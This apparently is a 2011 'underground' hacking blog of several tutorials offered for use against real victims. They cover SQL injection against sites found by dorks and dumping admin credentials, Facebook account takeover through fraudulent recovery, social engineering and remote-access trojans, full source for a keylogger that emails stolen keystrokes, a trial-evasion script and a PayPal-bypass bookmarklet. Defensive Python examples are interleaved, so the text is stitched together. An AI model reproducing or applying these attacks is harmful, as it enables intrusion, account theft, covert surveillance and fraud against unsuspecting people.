About Me

I have lived in the "Underground" world of Hacking, Fraud, Viruses, Warez and such since I was very young. I have multiple accounts on a menagerie of Public and Private sites, forums and FTPs. I have learned the secrets that very few have access to. I hope to enlighten you with a little of this knowledge. In this blog I will post tutorials, downloads and other things that people on "The Scene" don't want you to have. I am Silent Monk.

Wednesday, March 16, 2011

How to Hack Using SQL Injection (Very Easy)

What exactly is SQL Injection?

SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks. (wikipedia definition)
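The two causes named in that definition (input that is not strongly typed, and input that ends up inside the SQL text) can be seen side by side in the following added example, which is not part of the original post. It uses Python's `sqlite3` as a stand-in for the PHP/MySQL stack behind an `index.php?id=` page; the table names, sample rows and function names are assumptions made for the demonstration.

```python
import re
import sqlite3

# Constructed probes in the style of the strings shown later in this post.
UNION_PROBE = "1 union all select 1,username,password from admins--"
ORDER_PROBE = "1 order by 10--"
QUOTE_PROBE = "1'"


class BadRequest(Exception):
    """Raised for any rejected or failed lookup; carries no SQL detail."""


def make_db():
    # Constructed sample data; table and column names are assumptions.
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admins (username TEXT, password TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'First post');
        INSERT INTO admins VALUES ('admin', 'constructed-hash');
        """
    )
    return db


def get_article_vulnerable(db, raw_id):
    # Flaw: the parameter becomes part of the SQL text, so "order by" and
    # "union" fragments are parsed as SQL, and driver errors reach the caller.
    return db.execute(
        "SELECT id, title, body FROM articles WHERE id = " + raw_id
    ).fetchall()


def get_article_hardened(db, raw_id):
    # 1. Strong typing: the id must be a short run of ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise BadRequest("invalid id")
    try:
        # 2. Bound parameter: the value is sent as data, never as SQL text.
        return db.execute(
            "SELECT id, title, body FROM articles WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        # 3. Generic error: no syntax or column-count message to read back.
        raise BadRequest("lookup failed") from None


def outcome(fn, db, raw_id):
    """Summarise one call as ('rows', n), ('sql_error', msg) or ('rejected', msg)."""
    try:
        return ("rows", len(fn(db, raw_id)))
    except BadRequest as exc:
        return ("rejected", str(exc))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))


if __name__ == "__main__":
    db = make_db()
    for probe in ("1", QUOTE_PROBE, ORDER_PROBE, UNION_PROBE):
        print(repr(probe))
        print("  vulnerable:", outcome(get_article_vulnerable, db, probe))
        print("  hardened:  ", outcome(get_article_hardened, db, probe))
```

The hardened function returns the same rows for a legitimate id and gives every probe the same short rejection, so neither the error text nor the page content changes with the injected fragment.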

What will I need to perform an SQL Injection attack?

[+] exploit scanner
[+] a good list of "google dorks"
[+] admin finder
[+] half a brain and the will to learn lol

I have provided all but 2 (in a .rar package available for download below) of the stated things above that you need. Also provided is a virus scan of the .rar for the skeptics lol

CLICK HERE TO DOWNLOAD THE TOOLS

Yes, I know it's 2/41. It's the exploit scanner. It's detected as an Exploits/Riskware scanner. I myself use this same tool and no, I'm not infected.


Code:
Antivirus      Version      Last Update      Result
a-squared    4.5.0.50    2010.01.18    -
AhnLab-V3    5.0.0.2    2010.01.18    -
AntiVir    7.9.1.142    2010.01.18    SPR/Tool.ExpScan
Antiy-AVL    2.0.3.7    2010.01.18    -
Authentium    5.2.0.5    2010.01.18    -
Avast    4.8.1351.0    2010.01.18    -
AVG    9.0.0.730    2010.01.18    -
BitDefender    7.2    2010.01.18    -
CAT-QuickHeal    10.00    2010.01.18    -
ClamAV    0.94.1    2010.01.18    -
Comodo    3625    2010.01.18    -
DrWeb    5.0.1.12222    2010.01.18    -
eSafe    7.0.17.0    2010.01.17    -
eTrust-Vet    35.2.7243    2010.01.18    -
F-Prot    4.5.1.85    2010.01.17    -
F-Secure    9.0.15370.0    2010.01.18    -
Fortinet    4.0.14.0    2010.01.18    -
GData    19    2010.01.18    -
Ikarus    T3.1.1.80.0    2010.01.18    -
Jiangmin    13.0.900    2010.01.18    -
K7AntiVirus    7.10.949    2010.01.16    -
Kaspersky    7.0.0.125    2010.01.18    -
McAfee    5864    2010.01.17    -
McAfee+Artemis    5864    2010.01.17    -
McAfee-GW-Edition    6.8.5    2010.01.18    Riskware.Tool.ExpScan
Microsoft    1.5302    2010.01.18    -
NOD32    4783    2010.01.18    -
Norman    6.04.03    2010.01.18    -
nProtect    2009.1.8.0    2010.01.18    -
Panda    10.0.2.2    2010.01.17    -
PCTools    7.0.3.5    2010.01.18    -
Prevx    3.0    2010.01.18    -
Rising    22.31.00.04    2010.01.18    -
Sophos    4.49.0    2010.01.18    -
Sunbelt    3.2.1858.2    2010.01.17    -
Symantec    20091.2.0.41    2010.01.18    -
TheHacker    6.5.0.6.154    2010.01.18    -
TrendMicro    9.120.0.1004    2010.01.18    -
VBA32    3.12.12.1    2010.01.17    -
ViRobot    2010.1.18.2142    2010.01.18    -
VirusBuster    5.0.21.0    2010.01.18    -

OK, after you are done downloading the tools, open the .rar located on your desktop. Now open the .txt called "dorks". From this list you can pick any dork you feel like scanning with. For good search results, search for a dork like this.

Code:
index.php?id=

After you have chosen a dork like the one above, copy it to your clipboard for further use. Now open your exploit scanner.exe (scanner made by reiluke). At the top where it says "Dork", you're going to want to paste your dork into the box. It should look something like this.

[Image: sqli1.jpg]

After you have done this, you're going to want to switch your "Max Url" from 100 to 1000 for a lot of search results. Then press scan on your exploit scanner. After it is done scanning, you're going to press "Test Sites". After all this is done you should have two lists and it should look like this.

[Image: sqli2.jpg]

After it is done testing all scanned sites, these pre-tested sites might be SQLi vulnerable, but you must first check each site individually. To test an individual site, add a " ' " after the URL. For example:

Code:
sqlivulnerablesite.com/index.php?id=1'

*NOTE* With this exploit scanner it auto-quotes all the urls.

Let's say, for instance, you found a site that might be vulnerable (or what you think may be a vulnerable site). If an error comes up on the web page, something like this:

Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Then it's vulnerable to SQL injection. The first step in this multi-step systematic attack on the SQL database is to find out the number of columns there are in the SQL database. To find this out we use this code injection in the address bar after the website URL. Like this.

Code:
sqlivulnerablesite.com/index.php?id=1 order by 1--

Load the page. If the page loads correctly with that code injection in the URL then we are on the right track.

Knowing that there is already 1 column in this database we do another code injection. Like this.

Code:
sqlivulnerablesite.com/index.php?id=1 order by 2--

If the page loads correctly again then this attack can still be performed.

Usually if the page loads correctly after trying the #2 then I try stepping the number up to around 10.

*NOTE* If you load the web page on a code injection like this.

Code:
sqlivulnerablesite.com/index.php?id=1 order by 10--

and you get a result like this.

Code:
Unknown column '10' in 'order clause'

Then you must go down a number until you reach the number of columns that are in the database, where the web page loads correctly without any errors. For instance, since the error on the web page said "unknown column '10'", we must go down to the number 9. Like this.

Code:
sqlivulnerablesite.com/index.php?id=1 order by 9--

If your page loads correctly then this means there are 9 columns in the database.

The next step in this attack is to find out what column is vulnerable to our attack. We use this code injection in your address bar after the vulnerable site. Like this.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,2,3,4,5,6,7,8,9--

After you have loaded the page it should show which columns are vulnerable. It usually shows about 2-3 columns. I personally use the lowest number that is vulnerable, for instance "2". Let's say the vulnerable column in the database is "2". The next code injection we use is to find out the version of the database. Like this.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,@@version,3,4,5,6,7,8,9

When the web page is loaded, where the number "2" was on the web page there should be, in place of it, the "database version". It is best if you are a beginner to make sure the database version is 5.0 or higher, like 5.0.17. Anything below 5.0 you are going to be required to brute force each of the tables for information. So now that we have the database version, which is "5.0.17", we must now find the table names with this code injection at the top in your address bar.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,table_name,3,4,5,6,7,8,9 from information_schema.tables--

After the page is loaded it should have all the table names on the web page. The table name that you're going to want to find is admins. Once you have found admins or something similar to that, we do another code injection to find out the columns which are in that table with this code.


Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(x)--

*NOTE* Here (x) is the ascii value of the table name.

Now we must find the ascii value of the word admins.

GO HERE TO CONVERT TEXT TO ASCII

The ascii value of admins is

Code:
& #97 ; & #100 ; & #109 ; & #105 ; & #110; & #115 ;

Delete all the ";" , "#" , and "&". So it should look like this.

Code:
97,100,109,105,110,115

Now replace the "x" with that ASCII number code. Now your new code injection should look something like this. Enter it in your URL address bar.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,column_name,3,4,5,6,7,8,9 from information_schema.columns where table_name=char(97,100,109,105,110,115)--

When the page loads you should get something like/similar to username and password on the web page. To get the data from that column you must use a code injection like this.

Code:
sqlivulnerablesite.com/index.php?id=1 union all select 1,concat(username),0x3a,(password),3,4,5,6,7,8,9 from --

*NOTE* (0x3a) is the ascii value of the column name

When the page loads it should show the data of the username and password for cpanel access.

Now to access the cpanel we must find the login page. I provided an admin finder.exe in the .rar. Open it up and type in the URL of your vulnerable site. From there it scans until it finds the login page for admin cpanel access, which can lead to defacement and web server compromise.
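Each step of the walkthrough above leaves a recognisable request in the web server's access log: the trailing quote, the `order by N--` column count, the `union all select` probe, the `@@version` read and the `information_schema` listing. The following added example, which is not part of the original post, groups those requests by client so a defender can see the sequence; the log lines, rule names and function names are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.7 - - [16/Mar/2011:10:00:01 +0000] "GET /index.php?id=1%27 HTTP/1.1" 200 512
203.0.113.7 - - [16/Mar/2011:10:00:09 +0000] "GET /index.php?id=1%20order%20by%2010-- HTTP/1.1" 200 498
203.0.113.7 - - [16/Mar/2011:10:00:20 +0000] "GET /index.php?id=1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9-- HTTP/1.1" 200 730
203.0.113.7 - - [16/Mar/2011:10:00:41 +0000] "GET /index.php?id=1%20union%20all%20select%201,table_name,3,4,5,6,7,8,9%20from%20information_schema.tables-- HTTP/1.1" 200 9001
198.51.100.20 - - [16/Mar/2011:10:01:02 +0000] "GET /index.php?id=2 HTTP/1.1" 200 1204
198.51.100.20 - - [16/Mar/2011:10:01:30 +0000] "GET /search.php?q=order+by+date HTTP/1.1" 200 300
""".splitlines()

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}'
)

# One rule per step of the walkthrough, applied to the decoded query string.
STAGES = [
    ("quote_probe", re.compile(r"=\d+'(?:&|$)")),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("version_probe", re.compile(r"@@version", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I)),
]


def normalise(target):
    """Decode the query string and flatten comment and whitespace padding."""
    text = unquote_plus(target.partition("?")[2])
    text = re.sub(r"/\*.*?\*/", " ", text)  # inline SQL comments used as spaces
    return re.sub(r"\s+", " ", text)


def scan(lines):
    """Return {client_ip: [stage names in order of first appearance]}."""
    seen = {}
    for line in lines:
        match = LINE.match(line)
        if not match:
            continue  # not a request line in the expected format
        text = normalise(match["target"])
        for name, pattern in STAGES:
            if pattern.search(text):
                stages = seen.setdefault(match["ip"], [])
                if name not in stages:
                    stages.append(name)
    return seen


def escalating(seen, min_stages=2):
    """Clients that progressed through several steps, worth an alert."""
    return sorted(ip for ip, stages in seen.items() if len(stages) >= min_stages)


if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for ip in escalating(hits):
        print(ip, "->", ", ".join(hits[ip]))
```

A single matched stage from one client is weak evidence on its own; several stages from the same client in sequence is the pattern to alert on.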

Another Way to Hack Facebook Accounts!

First of all, I want to say is this is not hacking, this is called "Reverting".

What is Reverting?

Reverting means undoing the effects of one or more edits, which normally results in the page being restored to a version that existed sometime previously.

NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk, also you can learn how to get your account back from this.

Ok, let's start:

Step 1: First of all open this link:

http://www.facebook.com/help/contact.php...in_changed

NOTE: Be sure you are not logged in.

Step 2: Your email address.

Simple, write your "own" email address, or the slave you are hacking.


Step 3: Can you send and receive emails from your login email address?

Choose "No".


Step 4: Has the login email address that you normally use to log in to your account been hacked?

Choose "Yes".


Step 5: Has the login email address on your account been changed?

Choose "Yes" again.


Step 6: Full name on the account.


If you still can't find it, then try using those links:

http://www.pipl.com/email
http://com.lullar.com

or google slave's address.

If you STILL can't find it, use a little SE (Social Engineering): try adding the slave as a friend, and you will be able to see his full name.

Since, I got full name of my slave, that's gonna look like this:

Step 7: Email address(es) that may be affiliated with the account.

Write "No".

Step 8: Your contact email address.

Write your email address where facebook can contact you. Example crazy@gmail.com.


Step 9: Your username (if applicable).

If you have created username, write it there. If you are not sure about your slave, ask him first, if he looks like confused and asking you what's that, then probably he doesn't have one. You can make username by logging your facebook first, going to "Settings" and click "change" on your username. Personally I don't have an username. Many people don't have a username, so write there "none", "don't have" or "no".


Step 10: URL (web address link) to your profile page.

You can find slave's profile page by searching their email. Login to your facebook, write their email in the search button and press Enter. After some seconds, their name will appear; click on it and copy the URL. There are more instructions in the pictures. They look bad but that was the best I could do.


Ok then, write slave's profile URL, and click the button "Submit".


Step 11: Once you're done and pressed the Submit button a message will appear:
"Thanks, your inquiry has been forwarded to the Facebook Team."

That means, you're done and you have to wait while facebook check up your request and send you email to the email you wrote where they can contact you.

How to Mass Add Friends on FaceBook

Go to your FaceBook account

[Image: account.jpg]
[Image: EditFriends.jpg]
[Image: Invite.jpg]
[Image: HowTo-1.jpg]


An email list for trial (20000+ emails >> all Mafia War addicts)
http://www.multiupload.com/T5CUE9ZD1B

Free Movies and TV using Graboid Hack

So if some of you may have heard, Graboid offers free movies, TV shows and more to download. It is subscription based on bandwidth. First, Download the Program HERE

Then after you open the program you will have the option to create an account.

[Image: grab1d.jpg]

Create it and log in. You will notice your bandwidth restriction, and your account will expire in a month, when you have to buy a subscription.

[Image: grab2.jpg]

Once your account has expired. I have discovered a new way to make accounts (NOTE: After your account is created, you will never be able to create a free account again, nor through the program or website).

Make this batch script:
Code:
cd %appdata%
del MozillaControl /F /q
cd “%LOCALAPPDATA%\Graboid_Inc\”
del *.* /F /q

Or download it HERE if you dont know how.

Run the batch file, and behold, the new account button shall appear again. Enter a different email address than previous, and you're good to go.

FOR THOSE WITH ISSUES CREATING ACCOUNTS:

1. Renew your IP address (unplug your modem for about 5mins and then reconnect it).

2. If the problem is not solved by number 2, download Hotspot Shield HERE

3. If it still doesn't work, wait a week. This will give a chance for your ISP to reset your IP. If it doesn't work then, PM me and I'll make you an account.

Hope this helped!


How to Make Your Own Keylogger!

1. STEP

Download Visual Basic Express Edition 2008 for free if you didn't already.

2. STEP

  • Run Visual Basic
  • In Tab click File > New Project
  • Windows Application > "Keylogger Builder" > Click Ok

3. STEP

Change the following from the Properties of Form1:

FormBorderStyle = FixedSingle
MaximizeBox = False
MinimizeBox = False
Show Icon = False
StartPosition = CenterScreen
Text = Keylogger Builder



From the Toolbox add:
  • TextBox1 - The GMail Username textbox
  • Textbox2 - The Gmail Password textbox
  • Button1 - The Build button, Change text to: Build
  • Label1 - Change text to: Gmail Username
  • Label2 - Change text to: Gmail Password


4. STEP

Now when you add all these, on top of code add:

Code:
Imports System.IO

Now under Public Class Form1 add following code, that would be strings:

Code:
Dim stub, text1, text2 As String
    Const FileSplit = "@keylogger@"

Now when you done with that, just simply double click Button1 and add:

Code:
text1 = TextBox1.Text
        text2 = TextBox2.Text
        FileOpen(1, Application.StartupPath & "\Stub.exe", OpenMode.Binary, OpenAccess.Read, OpenShare.Default)
        stub = Space(LOF(1))
        FileGet(1, stub)
        FileClose(1)
        If File.Exists("Server.exe") Then
            My.Computer.FileSystem.DeleteFile("Server.exe")
        End If
        FileOpen(1, Application.StartupPath & "\Server.exe", OpenMode.Binary, OpenAccess.ReadWrite, OpenShare.Default)
        FilePut(1, stub & FileSplit & text1 & FileSplit & text2 & FileSplit)
        FileClose(1)
        MsgBox("The Server.exe is builded!")

Now you got your builder and now lets move to Stub.

5. STEP
  • Run Visual Basic
  • In Tab click File > New Project
  • Windows Application > "Stub" > Click Ok

6. STEP

Change the following from the Properties of Form1:

FormBorderStyle = FixedToolWindow
StartPosition = CenterScreen
Text = (no text)
WindowsState = Minimized


From the Toolbox add:
  • Textbox1 - KEY LOGGER(follow everything what slave write)
  • Textbox2 - GMail Username
  • Textbox3 - GMail Password
  • Timer1 - Upload Interval
  • Timer2 - Get name of window where keylogger get keys (useful)
  • Timer3 - Get Key


Timer1 Interval = 900000
Timer2 Interval = 100
Timer3 Interval = 100

7. STEP

Now when you add all these, on top of code add:

Code:
Imports System.IO
Imports System.Net.Mail

Now under Public Class Form1 add following code, that would be strings:

Code:
Dim options(), text1, text2 As String
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Dim result As Integer
    Const FileSplit = "@keylogger@"

Now double click Timer1 and write following code:

Code:
Dim MailSetup As New MailMessage
        MailSetup.Subject = My.Computer.Name & ":"
        MailSetup.To.Add(TextBox2.Text)
        MailSetup.From = New MailAddress(TextBox2.Text)
        MailSetup.Body = TextBox1.Text
        Dim SMTP As New SmtpClient("smtp.gmail.com")
        SMTP.Port = 587
        SMTP.EnableSsl = True
        SMTP.Credentials = New Net.NetworkCredential(TextBox2.Text, TextBox3.Text)
        SMTP.Send(MailSetup)
        TextBox1.Clear()

And add this as Function to source code:

DOWNLOAD HOW TO ADD FUNCTION IF YOU DONT KNOW:

http://www.mediafire.com/?hyr22ivdg2m

Code:
Private Declare Function GetForegroundWindow Lib "user32.dll" () As Int32
    Private Declare Function GetWindowText Lib "user32.dll" Alias "GetWindowTextA" (ByVal hwnd As Int32, ByVal lpString As String, ByVal cch As Int32) As Int32
    Dim strin As String = Nothing

    Private Function GetActiveWindowTitle() As String
        Dim MyStr As String
        MyStr = New String(Chr(0), 100)
        GetWindowText(GetForegroundWindow, MyStr, 100)
        MyStr = MyStr.Substring(0, InStr(MyStr, Chr(0)) - 1)
        Return MyStr
    End Function

Now double click Timer2 to get names of active windows:

Code:
If strin <> GetActiveWindowTitle() Then
            TextBox1.Text = TextBox1.Text + vbNewLine & "[" & GetActiveWindowTitle() & "]:" + vbNewLine
            strin = GetActiveWindowTitle()
        End If

Now double click Form1 and write following code:

Code:
FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared)
        text1 = Space(LOF(1))
        text2 = Space(LOF(1))
        FileGet(1, text1)
        FileGet(1, text2)
        FileClose(1)
        options = Split(text1, FileSplit)
        TextBox2.Text = options(1)
        TextBox3.Text = options(2)
        Timer1.Start()
        Timer2.Start()

Now double click Timer3 and paste the code:

Code:
For i = 1 To 255
            result = 0
            result = GetAsyncKeyState(i)
            If result = -32767 Then
                TextBox1.Text = TextBox1.Text + Chr(i)
            End If
        Next i


8. STEP

You are done!

Finally you made your own keylogger ... enjoy, and for more information and error reports please PM or post here, I'll fix it :)


Download Project:
http://www.mediafire.com/?izztizynwjz
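For triage of a suspected sample, the layout the builder writes (stub bytes, then `@keylogger@`, the mailbox name, `@keylogger@`, the password, `@keylogger@`) can be checked for and parsed to recover the collecting mailbox. This is an added example, not part of the original post; it assumes the bytes land in the file in the order of the builder's `FilePut` call, and the sample bytes and function name are constructed.

```python
MARKER = b"@keylogger@"  # the FileSplit constant from the builder code above


def extract_trailer(data: bytes):
    """Return the appended configuration if the builder's trailer is present.

    Splitting from the right keeps the check correct even if the marker
    bytes also occur somewhere inside the stub itself.
    """
    parts = data.rsplit(MARKER, 3)
    # Expected: [stub, mailbox, password, b""] with the file ending on a marker.
    if len(parts) != 4 or parts[3] != b"":
        return None
    stub, account, secret = parts[0], parts[1], parts[2]
    for field in (account, secret):
        # Both fields are short typed text; anything else is a coincidence.
        if not field or len(field) > 254:
            return None
        if not all(32 <= byte < 127 for byte in field):
            return None
    return {
        "stub_size": len(stub),
        "account": account.decode("ascii"),
        # Report the length only, so the secret stays out of case notes.
        "secret_length": len(secret),
    }


# Constructed sample: 64 placeholder bytes standing in for the stub.
SAMPLE = (
    b"MZ" + bytes(62)
    + MARKER + b"collector@example.com"
    + MARKER + b"constructed-password"
    + MARKER
)

if __name__ == "__main__":
    print(extract_trailer(SAMPLE))
    print(extract_trailer(b"MZ" + bytes(62)))  # clean file: None
```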

How to Hack Facebook!

Social Engineering

-Ah, the classic stories of "My friend hacked my facebook" or "How can I hack my friend?" or my personal favorite "How to hack my girlfriend's Facebook?"

A common mistake by laymen who do not know much about the internet is giving information out without actually knowing that they are giving the information out.

Social Engineering on Facebook seems like a joke considering that you aren't going to ask the person their password and e-mail for you to log in. Even if they do in fact give you their information voluntarily, it's pointless.

Why is it pointless? Well, Facebook has become smarter on their security.


Basically, it comes down to this.

Facebook will detect 'Suspicion' on the account that you are logging in and it will not allow you to log in under that account simply because their logs of the original account owner do not match with your IP or the IP you are hidden behind.

1) Suspicion

2) Security question

3) Confirm Identity

4) Confirm identity by identifying the friends on that account.

Now to retrieve back to the very beginning of this tutorial, I said that Key logging, Phishing, Social Engineering, and RATs were the common methods associated with hacking a Facebook account.

I will respectfully correct my mistake and as well as the other tutorials on here.

1) Even if you do manage to steal the password and e-mail using Keylogs, the problem of suspicion will appear.

2) Even if you do manage to steal the password and e-mail using Phishing, the problem of suspicion will appear.

3) Even if you do manage to crack the password out of your target through Social Engineering, the problem of suspicion will appear.

4) RATs are probably and definitely the best way to go into "hacking" a Facebook account simply because you will have full access to their computers. You can change their info through computers and the problem of suspicion will not appear.

RATs are NOT the only possible way to get in! Keylogging, Phishing, and Social Engineering might work as well.

I believe that Facebook compares the ranges of IP based on the ISP of the target. Now, if that's the case...Simply do a whois on the slave using the RAT.

If you do not know what whois is, it's basically a query that searches where the target is located. Normally you can double click on the slave when they are online on the RAT and see where they are from and look at their IP.

Now, you don't really need a RAT to tell you where the slave lives or his IP. If you already have his IP or location through other methods such as reverting you're good to go.

However, if you do not have any information at all what so ever, you can try searching on these sites to revert info about the target.

http://com.lullar.com/

http://www.pipl.com/email/

http://www.spokeo.com

http://www.emailfinder.com

http://www.zabasearch.com/

http://www.zoominfo.com

Now, once you have an IP or ISP, or location the next part is looking for a Sock5 to hide behind so Facebook thinks that you are only using a different computer in the same area. You can also spoof the IP, but I will not go into that.

So, after all that work, you still can't take over their accounts?


Matching Faces

I thought about this method as I was showing a friend through Teamviewer the pictures that Facebook was showing me to identify the target's friends. And obviously, I was clueless because I did not know of the people.

What did I do? Well, as you can see the picture #4:

1) Suspicion

2) Security question

3) Confirm Identity

4) Confirm identity by identifying the friends on that account.

[Image: 39867076.png]

Facebook provides the names of the target's friends. So, use that information to essentially bypass the security of identification by searching those names on Facebook search and matching the faces based on the Target's friends.

It will only ask you match faces if you are logging in with the correct password or if you get picked up from a different location.

Note that you will need an extra Facebook account to search, otherwise Facebook does not let you search. Close the 'Suspicion' page and log in to your extra or your actual Facebook account and search for the Target's friends.

Be sure to notice where your target lives so on the results you can compare whether if the friend is the matching face or not. Be sure to notice the names of the friends as well.

For example, if the name choices are:
George Bush
Adolf Hitler
Barrack Obama
Mohammed Ali
Lee Chang

And the picture given is of an middle eastern descent looking person, you should obviously go with the name that sounds middle eastern.

Once you match the faces for the identification questions. You should be able to get in without a problem.

To wrap it up,

I will warn you of one important thing: if you do not have access to their e-mails, they will get an e-mail notifying that someone is trying to log in on their accounts and your IP will be shown to them.

So, what that means is to always hide behind a VPN or a proxy so you can't be traced back.

Try to take over their e-mails if you want or simply delete the notification e-mails so they do not notice.

Taking over the e-mail will be an obvious sign that they got hacked and they might try to retrieve the e-mail password, so be sure to change the e-mail password and security questions immediately so they cannot get it back. Only take over the e-mail once you have completely stolen and gained access to the Facebook account because they can easily change the e-mail on the Facebook account and you'll be screwed.

6) Regaining access

This is a new section on the tutorial which I decided to include since it's important to know if accidents were to happen.

1) Person updates their security

2) Person continues updating security

3) Person finishes security

So, what this means is that you will be left out of their account if they update their security information and you will have to bypass all the security measures all over again.

This is what you will see:
1) This is what will show telling you "You used an old password"

This picture shows that you have logged in with their old password, and will ask to confirm that it's in fact you.

2) The options to using old password.

This will give you the options of how you confirm that it's in fact you.

3) Identify your account (Note that you are the one who has to identify yet again)

I chose to confirm using profile URL. There are a variety to choose from.

4) Linking to profile

I linked it here.
5) Applying CAPTCHA security

Fill out CAPTCHA.

6) My account has been hacked and I have access to my login e-mail
Confirm My Account

This is the page where you could retrieve Facebook into sending you the new password to their e-mail (If you have access) or even perhaps a different e-mail. Make your story sound as believable as possible, so don't type like you are 10 years old.

Bypass Paypal to get things for Free!


Just add the following to a bookmark, or copy/paste it into your address bar.


Code:
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

When you visit a page using a paypal button, just click the bookmark or paste the code in the URL bar of your navigator.

If it works, you will be redirected to the download page.
Else, try another site (or buy it)

It works with :
Chrome [X]
Firefox [X]
IE [?] (anyone can test it?)
Opera [X]
Safari [X]

A link the script works on : http://www.ptcexpert.com
If you find another link, please share.
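The bookmarklet above only has something to read when the payment form's `return` field is itself the download page. A merchant-side design that removes that dependency, shown as an added example that is not part of the original post: the `return` value points at an order status page, and a download link is issued only for an order the server has marked paid. All names, the URL and the in-memory order store are hypothetical, and verification of the payment provider's server-to-server notification is assumed to happen before `mark_paid` is called.

```python
import hashlib
import hmac
import time

SECRET = b"constructed-demo-key"  # assumption: a server-side signing key
ORDERS = {}  # hypothetical store: order_id -> {"item": str, "paid": bool}
TOKEN_LIFETIME = 600  # seconds


def create_order(order_id, item):
    """Register an unpaid order and return the value for the form's return field."""
    ORDERS[order_id] = {"item": item, "paid": False}
    # The return URL names the order only; it never locates the product.
    return "https://shop.example/order-status?order=" + order_id


def mark_paid(order_id):
    """Call only after the provider's payment notification has been verified."""
    ORDERS[order_id]["paid"] = True


def _sign(order_id, item, expires):
    message = "{}:{}:{}".format(order_id, item, expires).encode()
    return hmac.new(SECRET, message, hashlib.sha256).hexdigest()


def issue_download_token(order_id, now=None):
    """Status-page handler: hand out a short-lived link for paid orders only."""
    now = time.time() if now is None else now
    order = ORDERS.get(order_id)
    if order is None or not order["paid"]:
        return None
    expires = int(now) + TOKEN_LIFETIME
    return "{}:{}:{}".format(order_id, expires, _sign(order_id, order["item"], expires))


def verify_download_token(token, now=None):
    """Download handler: return the item name for a valid token, else None."""
    now = time.time() if now is None else now
    try:
        order_id, expires_text, signature = token.rsplit(":", 2)
        expires = int(expires_text)
    except (AttributeError, ValueError):
        return None
    order = ORDERS.get(order_id)
    if order is None or not order["paid"] or expires < now:
        return None
    expected = _sign(order_id, order["item"], expires)
    if not hmac.compare_digest(signature.encode(), expected.encode()):
        return None
    return order["item"]


if __name__ == "__main__":
    print(create_order("A100", "ebook.pdf"))
    print(issue_download_token("A100"))  # None: nothing has been paid
    mark_paid("A100")
    print(verify_download_token(issue_download_token("A100")))  # ebook.pdf
```

Following the return URL before payment then shows an unpaid order and nothing else.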